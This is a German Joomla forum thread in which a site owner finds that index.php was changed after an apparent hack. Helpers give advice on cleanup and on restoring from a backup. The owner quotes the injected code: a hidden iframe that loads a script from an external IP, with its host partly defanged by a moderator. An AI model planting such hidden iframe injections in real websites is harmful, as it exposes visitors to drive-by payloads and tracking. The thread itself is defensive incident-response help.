Website nach Moduländerung zerstört?
In den Modulen der Website wurde eine kleine Textliche Änderung vorgenommen. Jetzt sind sämmtliche Inhalte nicht mehr sichtbar, dafür erscheint eine weiße Seite mit der FehlermeldungParse error: syntax error, unexpected '<' in /public/www/kunden/k0264/htdocs/gaertnerei-hueskes.de/index.php on line 89Jedoch an der index.php im Templatet wurde überhaupt keine Änderung vorgenommen. Wie kann so etwas sein und vor allem was kann man dagegen tun?
Hallo.
Leider sieht es sehr danach aus, als wenn ihr erfolgreich gehackt wurdet. Es geht hier um die index.php im Joomla Hauptverzeichnis. Bitte lade Dir diese Datei runter und öffne sie in einem reinem Texteditor. Erste Möglichkeit, Ihr habt beim hochladen der veränderten Moduldatei die index.php überschrieben (unwahrscheinlich, da im Modul eigentlich keine index.php vorkommt und daher die Datei nicht verwechselt werden kann). Zweite, wesentlich wahrscheinlichere Variante, Ihr wurdet erfolgreich gehackt. Das könnte z. B. durch die völlig veraltete Joomla Version und daher auch vermutlich veraltet Erweiterungen ermöglicht worden sein, leider wurden keine Updates durchgeführt. Bitte nehmt dies Bedrohung ernst und arbeitet die Liste in Abschnitt 2.6 der FAQ Punkt für Punkt durch. Bei Fragen evt. den Hoster oder einen Profi beauftragen.
P.S.: Den Thread habe ich in den richtigen Forenbereich verschoben, er war irrtümlich unter Joomla 1.6 einsortiert.
Geändert von Lacki (28.12.2010 um 12:03 Uhr)
Fragen und Antworten zu Joomla in den Joomla FAQ - Problem gelöst? Bitte so markieren - Unsere Forenregeln
Hackerangriff vermutet
Ich denke auch das es ein Hackerangriff war, abweichend von Standartquelltext seht hier echo JResponse::toString($mainframe->getCfg('gzip'));
<iframe src="http://ip.../stats/priemIframe.php?hashftp=507d068a8ebed73e9d499b7045 db1859&hashpage=3183fe467cdc220acf9bf08d3cc3e55e" width=10 border=1 height=10 style="visibility:hidden"></iframe> Ich vermute das diese IP der Hacker ist.
Was kann ich jetzt tun. Das Backup habe ich jetzt gesichert. Ich wollte die Daten auf dem Server enfernen, das Joomla wieder neu auf dem Server instalieren und dann die Ihnhalte wieder neu rein bringen. Geht das?
Geändert von Lacki (28.12.2010 um 13:33 Uhr) Grund: Hackerlink entfernt
Ja, es handelt sich um einen Hack (Habe den Link etwas verfremdet, sowas muss man hier nicht veröffentlichen). Wenn Du ein Backup hast, welches vor dem Hack erstellst wurde, kann man die Inhalte retten. Wenn es aus dem Backup nach dem Hack exrahiert werden soll, kann man das nur sehr erfahrenen Useren empfehlen, auch in den Inhalten der Datenbank können sich eingeschleuste Javascripts und Zugänge befinden, die man nur mit viel Akribie und Wissen rausfischen kann. Sonst bitte schnellstmöglich die Inhalte von der Webseite nehmen, Lücke finden und schließen. Und wie gesagt, ohne Backup von vor dem Hack wird es sehr schwer bis unmöglich.
Fragen und Antworten zu Joomla in den Joomla FAQ - Problem gelöst? Bitte so markieren - Unsere Forenregeln
Gehe so https://www.fc-hosting.de/joomla/tip...la-gehackt.php vor.
Warum bist Du Lackis Link nicht gefolgt, dann hättest du Dir diese Frage sparen können.
Berechtigungen
LinkBack URL
About LinkBacks
Zitieren
Lesezeichen